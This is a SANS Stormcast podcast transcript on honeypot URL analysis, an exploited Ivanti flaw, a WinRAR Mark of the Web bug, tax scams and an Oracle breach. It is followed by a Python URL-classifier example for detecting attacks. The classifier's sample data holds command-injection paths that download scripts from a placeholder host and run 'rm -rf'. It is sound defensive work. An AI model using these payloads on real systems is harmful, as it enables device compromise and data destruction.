Hello and welcome to the Friday, April 4th, 2025
edition of the SANS Internet Storm Center's Stormcast. My
name is Johannes Ullrich and today I'm recording from
Jacksonville, Florida. Today we got another diary from one
of our undergraduate interns, Gregory Weber, who did talk about
analyzing URLs collected by honeypots and how to
identify malicious traffic and distinguish it from normal
traffic to a web application. Of course, honeypots, by
definition, really only get malicious requests. So Gregory
did compare it to data from a normal website, did some
frequency analysis on it, and actually came up with a model
that looks reasonably good in distinguishing attacks from
non-attacks. I think it still needs a little bit of
refinement and maybe more data really to validate it well,
but it's an interesting approach and there, of course,
is a lot of work happening currently doing sort of some
more automated log analysis, automated intrusion detection,
using some of these machine learning techniques.

And the next story falls in the category, never underestimate
the creativity of a sophisticated attacker. In
this example, it's a critical vulnerability in Ivanti
Connect Secure. It was patched in February. It's a buffer
overflow, but exploitation is quite constrained for that
buffer overflow. So Ivanti initially assessed that this
particular vulnerability is not exploitable. Well, they
were proven wrong now, apparently, by some actor that
may be associated with some Chinese state actors.
According to Mandiant, who wrote about it, it looks like
they reversed the patch, a very common technique, of
course, to figure out what the exact vulnerability was. And
yes, then came up with an exploit that was applicable,
even though these constraints, of course, still applied.
Interesting blog post. Apparently, these attacks
started in mid-March. And as of today, Ivanti also
disclosed that this vulnerability has actually
been exploited.

And yet another Mark of the Web
vulnerability, this time in WinRAR. So like all of these
decompression unpacking style programs, well, if the
original file was downloaded from the web, they have to
apply this mark of the web to all the files that they're
expanding. WinRAR usually does that, but apparently doesn't
do it correctly if there are symlinks involved. And that's
the vulnerability that was addressed here. Not a huge
deal, I think, but certainly something that you do want to
update, given that this is a relatively popular software.

And well, it's already sort of a week into April almost. With
that, we are getting close to the tax filing deadline in the
U.S., April 15th. Microsoft released a timely warning here
that, well, they're seeing, of course, the usual number of
tax-related scams. And definitely something that you
do want to share with colleagues, particular less
technical colleagues, what is being done here right now.
Personally, I've actually not seen a lot. I don't think any
really so far this year. But the typical things are fake
tax form download sites, QR codes being used to trick
users into going to malicious sites. Also, be a little bit
careful as to what websites you're using for tax filing
services. Remember, I think it was two years ago, we found
like e-file.com, for example, being compromised around tax
filing season. So definitely go with name brand websites
that you have used in the past that already have your data.
And so far, if they're compromised, well, your data
is lost anyway. But definitely be a little bit careful here
who you are using in order to file your taxes. And with that,
giving them a lot of your personal information.

And talking about trust and breaches, Oracle now
apparently has notified some of its customers that their
login credentials may have been leaked. They say this is
associated with an older system. And the data that was
actually being leaked here was not current data. Now, the
group that actually leaked the data has disputed that. Again,
this comes back down to how much do you trust your cloud
providers? Because in the end, that's what cloud is all
about. You can't really verify their information that they're
giving you. So you're trusting that they're giving you the
right, correct information to make sound decisions with.
Assume something happened here. But of course, we still
don't exactly know what and what the extent is. And yes,
be ready that Oracle may notify you in private, even
though their public statements at this point don't really say
much about this particular breach.

Well, that's it for
today. If you've got a minute, please leave a good review on
any of the podcast sites where you're downloading this
particular podcast. And subscribe, of course, to
automatically be offered any new episodes being released.
Remember, we also have like Alexa, for example. You can
get the podcast via that. We have YouTube and a bunch of
other channels where we do offer this podcast. Thanks and
talk to you again on Monday. Bye.
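As an added illustration of the frequency-analysis idea from the first story (the honeypot URLs versus normal web-application URLs), here is a small token-frequency classifier. This is example code written for this page; it is not Gregory Weber's model and not ISC code. The two URL lists, the tokenization rule, the add-one smoothing and the zero threshold are all assumptions made for the example, and every URL in it is constructed sample data rather than captured traffic.

```python
# Added example, not from the ISC diary: a token-frequency classifier that
# separates honeypot-style URLs from ordinary web-application URLs.
# All URLs below are constructed sample data, not captured traffic.
import math
import re
from collections import Counter

# Constructed request paths of the kind a web honeypot collects.
HONEYPOT_URLS = [
    "/cgi-bin/luci/;stok=/locale?form=country&operation=write",
    "/boaform/admin/formLogin?username=admin&psd=admin",
    "/shell?cd+/tmp;rm+-rf+*;wget+http://1.2.3.4/bin.sh",
    "/.env",
    "/wp-login.php",
    "/xmlrpc.php",
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "/HNAP1/",
    "/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh",
    "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*",
]

# Constructed request paths from a normal web application's access log.
NORMAL_URLS = [
    "/", "/index.html", "/about", "/blog/2025/04/tax-season-scams",
    "/static/css/main.css", "/static/js/app.js", "/images/logo.png",
    "/api/v1/posts?page=2", "/api/v1/posts/42", "/contact", "/login",
    "/search?q=honeypot", "/favicon.ico", "/robots.txt",
]

# Words (letters, digits, '_', '.', '-') become one token each; every other
# character (/, ?, =, ;, +, %, ...) is its own token, because separators
# and shell metacharacters carry much of the signal.
TOKEN_RE = re.compile(r"[A-Za-z0-9_.-]+|[^A-Za-z0-9_.-]")


def tokenize(url):
    return [t.lower() for t in TOKEN_RE.findall(url)]


def build_model(attack_urls, normal_urls):
    """Count token frequencies in each corpus (the frequency analysis)."""
    attack = Counter(t for u in attack_urls for t in tokenize(u))
    normal = Counter(t for u in normal_urls for t in tokenize(u))
    return {
        "attack": attack,
        "normal": normal,
        "attack_total": sum(attack.values()),
        "normal_total": sum(normal.values()),
        "vocab": len(set(attack) | set(normal)),
    }


def token_log_ratio(model, tok):
    """log P(tok|attack) / P(tok|normal) with add-one (Laplace) smoothing,
    so a token seen in only one corpus does not yield a zero probability."""
    p_attack = (model["attack"][tok] + 1) / (model["attack_total"] + model["vocab"])
    p_normal = (model["normal"][tok] + 1) / (model["normal_total"] + model["vocab"])
    return math.log(p_attack / p_normal)


def score(model, url):
    """Sum of per-token log ratios (a naive Bayes score): positive means the
    URL looks more like the honeypot corpus than like the normal corpus."""
    return sum(token_log_ratio(model, tok) for tok in tokenize(url))


def is_attack(model, url, threshold=0.0):
    return score(model, url) > threshold


def top_attack_tokens(model, n=10):
    """Tokens most over-represented in the honeypot corpus, to see what the
    frequency analysis actually keys on."""
    ranked = sorted(model["attack"], key=lambda t: token_log_ratio(model, t), reverse=True)
    return [(t, round(token_log_ratio(model, t), 2)) for t in ranked[:n]]


MODEL = build_model(HONEYPOT_URLS, NORMAL_URLS)

if __name__ == "__main__":
    for url in ["/boaform/admin/formPing?target_addr=;wget+http://1.2.3.4/x",
                "/blog/2025/03/welcome",
                "/wp-config.php.bak"]:
        label = "ATTACK" if is_attack(MODEL, url) else "normal"
        print(f"{score(MODEL, url):+.2f}  {label}  {url}")
    print(top_attack_tokens(MODEL, 5))
```

Run as a script, it scores three held-out URLs and lists the tokens that pull hardest toward "attack" (shell metacharacters such as `+` and `;`, encoded path traversal, admin-style words). The third URL, `/wp-config.php.bak`, is a realistic miss: none of its tokens appear in the tiny honeypot corpus, so the model scores it as normal. That is the kind of gap more honeypot data and refinement would close, as the diary discussion notes.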